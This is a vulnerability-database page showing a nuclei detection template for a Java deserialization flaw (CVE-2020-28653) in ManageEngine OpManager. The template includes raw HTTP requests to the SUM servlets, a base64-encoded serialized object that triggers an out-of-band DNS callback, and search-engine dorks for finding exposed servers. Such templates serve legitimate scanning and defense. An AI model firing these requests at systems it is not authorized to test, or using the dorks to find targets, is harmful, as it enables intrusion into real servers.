Lucene search
K

ManageEngine OpManager SumPDU 12.1 - 12.5.232 - Java Deserialization

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 11 Views

ManageEngine OpManager SumPDU deserialization enables remote code execution; update to 125203.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2020-2853
13 Sep 202117:27
githubexploit
0day.today
ManageEngine OpManager SumPDU Java Deserialization Exploit
21 Sep 202100:00
zdt
Circl
CVE-2020-28653
3 Feb 202118:49
circl
CNNVD
ZOHO ManageEngine OpManager 安全漏洞
3 Feb 202100:00
cnnvd
CNVD
ZOHO ManageEngine OpManager Remote Code Execution Vulnerability
5 Feb 202100:00
cnvd
CVE
CVE-2020-28653
3 Feb 202116:00
cve
Cvelist
CVE-2020-28653
3 Feb 202116:00
cvelist
Tenable Nessus
ManageEngine OpManager Smart Update Manager RCE
2 Apr 202100:00
nessus
Metasploit
ManageEngine OpManager SumPDU Java Deserialization
20 Sep 202117:41
metasploit
NVD
CVE-2020-28653
3 Feb 202116:15
nvd
Rows per page
id: CVE-2020-28653

info:
  name: ManageEngine OpManager SumPDU 12.1 - 12.5.232 - Java Deserialization
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    Zoho ManageEngine OpManager Stable build before 125203 (and Released build before 125233) allows Remote Code Execution via the Smart Update Manager (SUM) servlet.
  impact: |
    Remote attackers can execute arbitrary code on the server, potentially leading to full system compromise.
  remediation: |
    Update to build 125203 or later.
  reference:
    - http://packetstormsecurity.com/files/164231/ManageEngine-OpManager-SumPDU-Java-Deserialization.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-28653
    epss-score: 0.787
    epss-percentile: 0.9954
    cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:*
  metadata:
    vendor: zohocorp
    product: manageengine_opmanager
    shodan-query:
      - http.title:"opmanager plus"
      - http.title:"opmanager"
    fofa-query:
      - title="opmanager plus"
      - title="opmanager"
    google-query:
      - intitle:"opmanager plus"
      - intitle:"opmanager"
  tags: cve,cve2020,packetstorm,java,deserialization,rce,opmanager,intrusive,vuln,vkev

variables:
  oast: ".{{interactsh-url}}"
  payload: "{{padding(oast,'a',50,'prefix')}}"

flow: http(1) && http(2) && http(3) && http(4)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 3

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - 'contains(body, "ManageEngine")'
        condition: and
        internal: true

  - raw:
      - |
        POST /servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
        internal: true

  - raw:
      - |
        POST /servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

        {{base64_decode('rO0ABXcEAAAD6g==')}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
        internal: true

  - raw:
      - |
        POST /servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

        {{replace(base64_decode('AAABX6ztAAVzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAMdwgAAAAQAAAAAXNyAAxqYXZhLm5ldC5VUkyWJTc2GvzkcgMAB0kACGhhc2hDb2RlSQAEcG9ydEwACWF1dGhvcml0eXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wABGZpbGVxAH4AA0wABGhvc3RxAH4AA0wACHByb3RvY29scQB+AANMAANyZWZxAH4AA3hw//////////90ADJhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYXQAAHEAfgAFdAAEaHR0cHB4dAA5aHR0cDovL2FhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFheA=='),'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa', payload)}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
# digest: 4b0a00483046022100a8f2f274ada6e342516a89b6d2a56c0d7acb6836c181f7243053e484cdd4a5cc0221008cc6d6243532609ee558d49080180132530edcb886b2ad0033a4925a5da507c8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 27.5
CVSS 3.19.8
EPSS0.787
11